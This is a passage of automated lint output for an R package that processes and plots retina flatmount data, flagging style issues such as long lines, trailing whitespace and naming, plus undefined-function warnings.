when creating average maps.\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/composite.R:3:1:](https://github.com/bc/retina/blob/002662d3eea76706eb6de58bc2991e242e85456e/R/composite.R#L3) *style:* **Lines should not be more than 80 characters.**\n```r\n​##' @param retina_list A list containing retina objects, with names(retina_list) all defined.\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/composite.R:4:1:](https://github.com/bc/retina/blob/002662d3eea76706eb6de58bc2991e242e85456e/R/composite.R#L4) *style:* **Lines should not be more than 80 characters.**\n```r\n​##' @param rotation_indices Each value in this vector will correspond to the amount of rotation applied to each retina in the list.\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/composite.R:5:1:](https://github.com/bc/retina/blob/002662d3eea76706eb6de58bc2991e242e85456e/R/composite.R#L5) *style:* **Lines should not be more than 80 characters.**\n```r\n​##' @param ... Arguments passed from other functions. You can access the thin plate spline interpolator here.\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/composite.R:6:1:](https://github.com/bc/retina/blob/002662d3eea76706eb6de58bc2991e242e85456e/R/composite.R#L6) *style:* **Lines should not be more than 80 characters.**\n```r\n​##' @return sum_mat The sum of all retina objects in the list, with respect to the rotation indices.\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/composite.R:9:16:](https://github.com/bc/retina/blob/002662d3eea76706eb6de58bc2991e242e85456e/R/composite.R#L9) *warning:* **no visible global function definition for ‘mat_from_ret_obj’**\n```r\n​    sum_mat <- mat_from_ret_obj(retina_list[[1]], rotation = 0, ...)\n               ^~~~~~~~~~~~~~~~\n```\n[R/composite.R:12:1:](https://github.com/bc/retina/blob/002662d3eea76706eb6de58bc2991e242e85456e/R/composite.R#L12) *style:* **Lines should not be more than 80 characters.**\n```r\n​        sum_mat <- sum_mat + mat_from_ret_obj(retina_list[[i]], rotation_indices[i], \n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/composite.R:12:85:](https://github.com/bc/retina/blob/002662d3eea76706eb6de58bc2991e242e85456e/R/composite.R#L12) *style:* **Trailing whitespace is superfluous.**\n```r\n​        sum_mat <- sum_mat + mat_from_ret_obj(retina_list[[i]], rotation_indices[i], \n                                                                                    ^\n```\n[R/matrix_retobj.R:3:1:](https://github.com/bc/retina/blob/002662d3eea76706eb6de58bc2991e242e85456e/R/matrix_retobj.R#L3) *style:* **Lines should not be more than 80 characters.**\n```r\n​##' You can decide how much to rotate the retina before returning the matrix. You can also pass arguments to the polar plotter.\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/matrix_retobj.R:6:1:](https://github.com/bc/retina/blob/002662d3eea76706eb6de58bc2991e242e85456e/R/matrix_retobj.R#L6) *style:* **Lines should not be more than 80 characters.**\n```r\n​##' @param n the number by which to divide the matrix by. Useful when generating partial averages.\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/matrix_retobj.R:7:1:](https://github.com/bc/retina/blob/002662d3eea76706eb6de58bc2991e242e85456e/R/matrix_retobj.R#L7) *style:* **Lines should not be more than 80 characters.**\n```r\n​##' @param reflect logical, by default it is TRUE, in order to view the retina from outside the eye (rather than from within.)\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/matrix_retobj.R:12:1:](https://github.com/bc/retina/blob/002662d3eea76706eb6de58bc2991e242e85456e/R/matrix_retobj.R#L12) *style:* **Lines should not be more than 80 characters.**\n```r\n​mat_from_ret_obj <- function(retina_object, rotation = 0, n = 1, reflect = TRUE, \n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/matrix_retobj.R:12:81:](https://github.com/bc/retina/blob/002662d3eea76706eb6de58bc2991e242e85456e/R/matrix_retobj.R#L12) *style:* **Trailing whitespace is superfluous.**\n```r\n​mat_from_ret_obj <- function(retina_object, rotation = 0, n = 1, reflect = TRUE, \n                                                                                ^\n```\n[R/matrix_retobj.R:17:1:](https://github.com/bc/retina/blob/002662d3eea76706eb6de58bc2991e242e85456e/R/matrix_retobj.R#L17) *style:* **Trailing whitespace is superfluous.**\n```r\n​    \n^~~~\n```\n[R/matrix_retobj.R:20:1:](https://github.com/bc/retina/blob/002662d3eea76706eb6de58bc2991e242e85456e/R/matrix_retobj.R#L20) *style:* **Lines should not be more than 80 characters.**\n```r\n​    az <- mapproject(x = retina_object$trimmed_data[, 2], retina_object$trimmed_data[, \n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/matrix_retobj.R:20:87:](https://github.com/bc/retina/blob/002662d3eea76706eb6de58bc2991e242e85456e/R/matrix_retobj.R#L20) *style:* **Trailing whitespace is superfluous.**\n```r\n​    az <- mapproject(x = retina_object$trimmed_data[, 2], retina_object$trimmed_data[, \n                                                                                      ^\n```\n[R/matrix_retobj.R:25:1:](https://github.com/bc/retina/blob/002662d3eea76706eb6de58bc2991e242e85456e/R/matrix_retobj.R#L25) *style:* **Trailing whitespace is superfluous.**\n```r\n​    \n^~~~\n```\n[R/matrix_retobj.R:27:1:](https://github.com/bc/retina/blob/002662d3eea76706eb6de58bc2991e242e85456e/R/matrix_retobj.R#L27) *style:* **Lines should not be more than 80 characters.**\n```r\n​    map2fit <- fit_plot_azimuthal(x2, y2, z2, plot_suppress = TRUE, extrapolate = TRUE, \n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/matrix_retobj.R:27:88:](https://github.com/bc/retina/blob/002662d3eea76706eb6de58bc2991e242e85456e/R/matrix_retobj.R#L27) *style:* **Trailing whitespace is superfluous.**\n```r\n​    map2fit <- fit_plot_azimuthal(x2, y2, z2, plot_suppress = TRUE, extrapolate = TRUE, \n                                                                                       ^\n```\n[R/matrix_retobj.R:28:1:](https://github.com/bc/retina/blob/002662d3eea76706eb6de58bc2991e242e85456e/R/matrix_retobj.R#L28) *style:* **Lines should not be more than 80 characters.**\n```r\n​        outer_radius = pi/2, falciform_coords = retina_object$azimuthal_data.falciform[[1]], \n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/matrix_retobj.R:28:26:](https://github.com/bc/retina/blob/002662d3eea76706eb6de58bc2991e242e85456e/R/matrix_retobj.R#L28) *style:* **Put spaces around all infix operators.**\n```r\n​        outer_radius = pi/2, falciform_coords = retina_object$azimuthal_data.falciform[[1]], \n                        ~^~\n```\n[R/matrix_retobj.R:28:93:](https://github.com/bc/retina/blob/002662d3eea76706eb6de58bc2991e242e85456e/R/matrix_retobj.R#L28) *style:* **Trailing whitespace is superfluous.**\n```r\n​        outer_radius = pi/2, falciform_coords = retina_object$azimuthal_data.falciform[[1]], \n                                                                                            ^\n```\n[R/matrix_retobj.R:30:5:](https://github.com/bc/retina/blob/002662d3eea76706eb6de58bc2991e242e85456e/R/matrix_retobj.R#L30) *style:* **Variable or function name should be snake_case.**\n```r\n​    MAT <- map2fit[[2]]$z\n    ^~~\n```\n[R/matrix_retobj.R:32:15:](https://github.com/bc/retina/blob/002662d3eea76706eb6de58bc2991e242e85456e/R/matrix_retobj.R#L32) *style:* **Put spaces around all infix operators.**\n```r\n​    return(MAT/n)\n             ~^~\n```\n[R/plotting_functions.R:3:1:](https://github.com/bc/retina/blob/002662d3eea76706eb6de58bc2991e242e85456e/R/plotting_functions.R#L3) *style:* **Lines should not be more than 80 characters.**\n```r\n​##' Extracts xy and falciform coordinates from datapoints collected from retistruct. Falc and Datapoints are stacked upon one another\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/plotting_functions.R:5:1:](https://github.com/bc/retina/blob/002662d3eea76706eb6de58bc2991e242e85456e/R/plotting_functions.R#L5) *style:* **Lines should not be more than 80 characters.**\n```r\n​##' @param datapoints_from_retistruct data structure that comes from the datapoints.csv, which is automatically generated by Retistruct.\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/plotting_functions.R:7:1:](https://github.com/bc/retina/blob/002662d3eea76706eb6de58bc2991e242e85456e/R/plotting_functions.R#L7) *style:* **Lines should not be more than 80 characters.**\n```r\n​##' @return L list of pixel xy positions, and falciform coordinates in [1] and [2], respectively\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/plotting_functions.R:9:1:](https://github.com/bc/retina/blob/002662d3eea76706eb6de58bc2991e242e85456e/R/plotting_functions.R#L9) *style:* **Lines should not be more than 80 characters.**\n```r\n​extract_xy_and_falciform <- function(datapoints_from_retistruct, number_of_sampling_sites) {\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/plotting_functions.R:10:1:](https://github.com/bc/retina/blob/002662d3eea76706eb6de58bc2991e242e85456e/R/plotting_functions.R#L10) *style:* **Lines should not be more than 80 characters.**\n```r\n​    pixel_xy_positions <- datapoints_from_retistruct[1:number_of_sampling_sites, \n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/plotting_functions.R:10:81:](https://github.com/bc/retina/blob/002662d3eea76706eb6de58bc2991e242e85456e/R/plotting_functions.R#L10) *style:* **Trailing whitespace is superfluous.**\n```r\n​    pixel_xy_positions <- datapoints_from_retistruct[1:number_of_sampling_sites, \n                                                                                ^\n```\n[R/plotting_functions.R:12:1:](https://github.com/bc/retina/blob/002662d3eea76706eb6de58bc2991e242e85456e/R/plotting_functions.R#L12) *style:* **Lines should not be more than 80 characters.**\n```r\n​    falciform_len <- length(datapoints_from_retistruct[, 1]) - length(pixel_xy_positions[, \n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/plotting_functions.R:12:91:](https://github.com/bc/retina/blob/002662d3eea76706eb6de58bc2991e242e85456e/R/plotting_functions.R#L12) *style:* **Trailing whitespace is superfluous.**\n```r\n​    falciform_len <- length(datapoints_from_retistruct[, 1]) - length(pixel_xy_positions[, \n                                                                                          ^\n```\n[R/plotting_functions.R:16:1:](https://github.com/bc/retina/blob/002662d3eea76706eb6de58bc2991e242e85456e/R/plotting_functions.R#L16) *style:* **Lines should not be more than 80 characters.**\n```r\n​    falciform_coordinates <- datapoints_from_retistruct[(xy_len + 1):total_len, ]\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/plotting_functions.R:22:1:](https://github.com/bc/retina/blob/002662d3eea76706eb6de58bc2991e242e85456e/R/plotting_functions.R#L22) *style:* **Lines should not be more than 80 characters.**\n```r\n​##' ImageJ values don't always show up the right way, because Y values get larger and positive while moving down the image.\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/plotting_functions.R:24:1:](https://github.com/bc/retina/blob/002662d3eea76706eb6de58bc2991e242e85456e/R/plotting_functions.R#L24) *style:* **Lines should not be more than 80 characters.**\n```r\n​##' @param falciform_xy_coordinates 2 columns of coordinate (X,Y) data in ImageJ pixel format\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/plotting_functions.R:28:1:](https://github.com/bc/retina/blob/002662d3eea76706eb6de58bc2991e242e85456e/R/plotting_functions.R#L28) *style:* **Lines should not be more than 80 characters.**\n```r\n​reflect_IJ_y_values_for_falciform <- function(falciform_xy_coordinates, xy_img_dimensions) {\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/plotting_functions.R:28:1:](https://github.com/bc/retina/blob/002662d3eea76706eb6de58bc2991e242e85456e/R/plotting_functions.R#L28) *style:* **Variable and function names should not be longer than 30 characters.**\n```r\n​reflect_IJ_y_values_for_falciform <- function(falciform_xy_coordinates, xy_img_dimensions) {\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/plotting_functions.R:28:1:](https://github.com/bc/retina/blob/002662d3eea76706eb6de58bc2991e242e85456e/R/plotting_functions.R#L28) *style:* **Variable or function name should be snake_case.**\n```r\n​reflect_IJ_y_values_for_falciform <- function(falciform_xy_coordinates, xy_img_dimensions) {\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/plotting_functions.R:29:1:](https://github.com/bc/retina/blob/002662d3eea76706eb6de58bc2991e242e85456e/R/plotting_functions.R#L29) *style:* **Lines should not be more than 80 characters.**\n```r\n​    falciform_xy_coordinates_transformed <- falciform_xy_coordinates  #make a copy\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/plotting_functions.R:29:5:](https://github.com/bc/retina/blob/002662d3eea76706eb6de58bc2991e242e85456e/R/plotting_functions.R#L29) *style:* **Variable and function names should not be longer than 30 characters.**\n```r\n​    falciform_xy_coordinates_transformed <- falciform_xy_coordinates  #make a copy\n    ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/plotting_functions.R:31:52:](https://github.com/bc/retina/blob/002662d3eea76706eb6de58bc2991e242e85456e/R/plotting_functions.R#L31) *style:* **Put spaces around all infix operators.**\n```r\n​    half_of_vertical_pixels <- xy_img_dimensions[2]/2\n                                                  ~^~\n```\n[R/plotting_functions.R:32:1:](https://github.com/bc/retina/blob/002662d3eea76706eb6de58bc2991e242e85456e/R/plotting_functions.R#L32) *style:* **Lines should not be more than 80 characters.**\n```r\n​    falciform_xy_coordinates_transformed$cyan <- (falc_y - half_of_vertical_pixels) * \n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/plotting_functions.R:32:86:](https://github.com/bc/retina/blob/002662d3eea76706eb6de58bc2991e242e85456e/R/plotting_functions.R#L32) *style:* **Trailing whitespace is superfluous.**\n```r\n​    falciform_xy_coordinates_transformed$cyan <- (falc_y - half_of_vertical_pixels) * \n                                                                                     ^\n```\n[R/plotting_functions.R:38:1:](https://github.com/bc/retina/blob/002662d3eea76706eb6de58bc2991e242e85456e/R/plotting_functions.R#L38) *style:* **Lines should not be more than 80 characters.**\n```r\n​##' Shows a visualization of the outline, as well as the location of each datapoint, with fit plot.\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/plotting_functions.R:40:1:](https://github.com/bc/retina/blob/002662d3eea76706eb6de58bc2991e242e85456e/R/plotting_functions.R#L40) *style:* **Lines should not be more than 80 characters.**\n```r\n​##' @param pixel_xy_positions 2 columns of coordinate (X,Y) data in ImageJ pixel format\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/plotting_functions.R:41:1:](https://github.com/bc/retina/blob/002662d3eea76706eb6de58bc2991e242e85456e/R/plotting_functions.R#L41) *style:* **Lines should not be more than 80 characters.**\n```r\n​##' @param z_vector numerical vector of density values for each of the coordinates\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/plotting_functions.R:42:1:](https://github.com/bc/retina/blob/002662d3eea76706eb6de58bc2991e242e85456e/R/plotting_functions.R#L42) *style:* **Lines should not be more than 80 characters.**\n```r\n​##' @param xy_outline_points 2 columns of coordinate(X,Y) data in ImageJ pixel format for the outline coordinates.\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/plotting_functions.R:45:1:](https://github.com/bc/retina/blob/002662d3eea76706eb6de58bc2991e242e85456e/R/plotting_functions.R#L45) *style:* **Lines should not be more than 80 characters.**\n```r\n​traditional_flatmount_plot <- function(pixel_xy_positions, z_vector, xy_outline_points) {\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/plotting_functions.R:46:1:](https://github.com/bc/retina/blob/002662d3eea76706eb6de58bc2991e242e85456e/R/plotting_functions.R#L46) *style:* **Lines should not be more than 80 characters.**\n```r\n​    fit <- Tps(pixel_xy_positions, z_vector)  # fits a surface to ozone measurements.\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/plotting_functions.R:46:12:](https://github.com/bc/retina/blob/002662d3eea76706eb6de58bc2991e242e85456e/R/plotting_functions.R#L46) *warning:* **no visible global function definition for ‘Tps’, Did you mean 'Ops'?**\n```r\n​    fit <- Tps(pixel_xy_positions, z_vector)  # fits a surface to ozone measurements.\n           ^~~\n```\n[R/plotting_functions.R:47:5:](https://github.com/bc/retina/blob/002662d3eea76706eb6de58bc2991e242e85456e/R/plotting_functions.R#L47) *warning:* **no visible global function definition for ‘set.panel’**\n```r\n​    set.panel(2, 2)\n    ^~~~~~~~~\n```\n[R/plotting_functions.R:49:5:](https://github.com/bc/retina/blob/002662d3eea76706eb6de58bc2991e242e85456e/R/plotting_functions.R#L49) *warning:* **no visible global function definition for ‘set.panel’**\n```r\n​    set.panel()\n    ^~~~~~~~~\n```\n[R/plotting_functions.R:52:5:](https://github.com/bc/retina/blob/002662d3eea76706eb6de58bc2991e242e85456e/R/plotting_functions.R#L52) *warning:* **no visible global function definition for ‘surface’**\n```r\n​    surface(fit)  # Quick image/contour plot of GCV surface.\n    ^~~~~~~\n```\n[R/plotting_functions.R:61:1:](https://github.com/bc/retina/blob/002662d3eea76706eb6de58bc2991e242e85456e/R/plotting_functions.R#L61) *style:* **Lines should not be more than 80 characters.**\n```r\n​##' Shows a visualization of the outline, as well as the location of each datapoint so the user can identify where the tears are.\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/plotting_functions.R:64:1:](https://github.com/bc/retina/blob/002662d3eea76706eb6de58bc2991e242e85456e/R/plotting_functions.R#L64) *style:* **Lines should not be more than 80 characters.**\n```r\n​##' @param path_to_retina_data_folder The path to the folder that contains the outline.roi file.\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/plotting_functions.R:65:1:](https://github.com/bc/retina/blob/002662d3eea76706eb6de58bc2991e242e85456e/R/plotting_functions.R#L65) *style:* **Lines should not be more than 80 characters.**\n```r\n​##' @return roi_coordinates XY vals of pixel coordinates of the outline points, in order.\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/plotting_functions.R:69:1:](https://github.com/bc/retina/blob/002662d3eea76706eb6de58bc2991e242e85456e/R/plotting_functions.R#L69) *style:* **Lines should not be more than 80 characters.**\n```r\n​    roi_object <- read.ijroi(file.path(path_to_retina_data_folder, \"outline.roi\"))\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/plotting_functions.R:69:19:](https://github.com/bc/retina/blob/002662d3eea76706eb6de58bc2991e242e85456e/R/plotting_functions.R#L69) *warning:* **no visible global function definition for ‘read.ijroi’**\n```r\n​    roi_object <- read.ijroi(file.path(path_to_retina_data_folder, \"outline.roi\"))\n                  ^~~~~~~~~~\n```\n[R/plotting_functions.R:70:1:](https://github.com/bc/retina/blob/002662d3eea76706eb6de58bc2991e242e85456e/R/plotting_functions.R#L70) *style:* **Trailing whitespace is superfluous.**\n```r\n​    \n^~~~\n```\n[R/plotting_functions.R:72:1:](https://github.com/bc/retina/blob/002662d3eea76706eb6de58bc2991e242e85456e/R/plotting_functions.R#L72) *style:* **Lines should not be more than 80 characters.**\n```r\n​    # format plots has the coordinate (0, 0) in the top left.  We have the coordinate\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/plotting_functions.R:73:1:](https://github.com/bc/retina/blob/002662d3eea76706eb6de58bc2991e242e85456e/R/plotting_functions.R#L73) *style:* **Lines should not be more than 80 characters.**\n```r\n​    # (0, 0) in the bottom left. We need to transform P so that the outline appears\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/plotting_functions.R:76:5:](https://github.com/bc/retina/blob/002662d3eea76706eb6de58bc2991e242e85456e/R/plotting_functions.R#L76) *style:* **Variable or function name should be snake_case.**\n```r\n​    roi_XY_coords <- roi_object$coords\n    ^~~~~~~~~~~~~\n```\n[R/plotting_functions.R:80:1:](https://github.com/bc/retina/blob/002662d3eea76706eb6de58bc2991e242e85456e/R/plotting_functions.R#L80) *style:* **Trailing whitespace is superfluous.**\n```r\n​    \n^~~~\n```\n[R/plotting_functions.R:81:1:](https://github.com/bc/retina/blob/002662d3eea76706eb6de58bc2991e242e85456e/R/plotting_functions.R#L81) *style:* **Lines should not be more than 80 characters.**\n```r\n​    plot(roi_XY_coords, type = \"l\", col = \"#d3d3d3\", asp = 1, xlab = \"X Pixels\", \n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/plotting_functions.R:81:81:](https://github.com/bc/retina/blob/002662d3eea76706eb6de58bc2991e242e85456e/R/plotting_functions.R#L81) *style:* **Trailing whitespace is superfluous.**\n```r\n​    plot(roi_XY_coords, type = \"l\", col = \"#d3d3d3\", asp = 1, xlab = \"X Pixels\", \n                                                                                ^\n```\n[R/plotting_functions.R:83:1:](https://github.com/bc/retina/blob/002662d3eea76706eb6de58bc2991e242e85456e/R/plotting_functions.R#L83) *style:* **Lines should not be more than 80 characters.**\n```r\n​    text(roi_XY_coords[, 1], roi_XY_coords[, 2], labels = 1:length(roi_XY_coords[, \n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/plotting_functions.R:83:83:](https://github.com/bc/retina/blob/002662d3eea76706eb6de58bc2991e242e85456e/R/plotting_functions.R#L83) *style:* **Trailing whitespace is superfluous.**\n```r\n​    text(roi_XY_coords[, 1], roi_XY_coords[, 2], labels = 1:length(roi_XY_coords[, \n                                                                                  ^\n```\n[R/plotting_functions.R:85:1:](https://github.com/bc/retina/blob/002662d3eea76706eb6de58bc2991e242e85456e/R/plotting_functions.R#L85) *style:* **Lines should not be more than 80 characters.**\n```r\n​    message(\"If you are getting this message, you are using a special feature. Contact me at brian.cohn@usc.edu and I will happily teach you how to use it.\")\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/plotting_functions.R:93:1:](https://github.com/bc/retina/blob/002662d3eea76706eb6de58bc2991e242e85456e/R/plotting_functions.R#L93) *style:* **Lines should not be more than 80 characters.**\n```r\n​##' @description Creates a markup.csv file. One of the dorsal_outline_index or nasal_outline_index must be filled in. Not both.\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/plotting_functions.R:96:1:](https://github.com/bc/retina/blob/002662d3eea76706eb6de58bc2991e242e85456e/R/plotting_functions.R#L96) *style:* **Lines should not be more than 80 characters.**\n```r\n​##' @param dorsal_outline_index The index of the point that points toward dorsal, or NA.\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/plotting_functions.R:97:1:](https://github.com/bc/retina/blob/002662d3eea76706eb6de58bc2991e242e85456e/R/plotting_functions.R#L97) *style:* **Lines should not be more than 80 characters.**\n```r\n​##' @param nasal_outline_index The index of the opint that points toward nasal, or NA.\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/plotting_functions.R:98:1:](https://github.com/bc/retina/blob/002662d3eea76706eb6de58bc2991e242e85456e/R/plotting_functions.R#L98) *style:* **Lines should not be more than 80 characters.**\n```r\n​##' @param path_to_retina_data_folder The path where the markup.csv file will be saved.\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/plotting_functions.R:100:1:](https://github.com/bc/retina/blob/002662d3eea76706eb6de58bc2991e242e85456e/R/plotting_functions.R#L100) *style:* **Lines should not be more than 80 characters.**\n```r\n​assemble_markup_file <- function(eye_left_or_right, path_to_retina_data_folder, dorsal_outline_index = NA, \n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/plotting_functions.R:100:107:](https://github.com/bc/retina/blob/002662d3eea76706eb6de58bc2991e242e85456e/R/plotting_functions.R#L100) *style:* **Trailing whitespace is superfluous.**\n```r\n​assemble_markup_file <- function(eye_left_or_right, path_to_retina_data_folder, dorsal_outline_index = NA, \n                                                                                                          ^\n```\n[R/plotting_functions.R:103:1:](https://github.com/bc/retina/blob/002662d3eea76706eb6de58bc2991e242e85456e/R/plotting_functions.R#L103) *style:* **Lines should not be more than 80 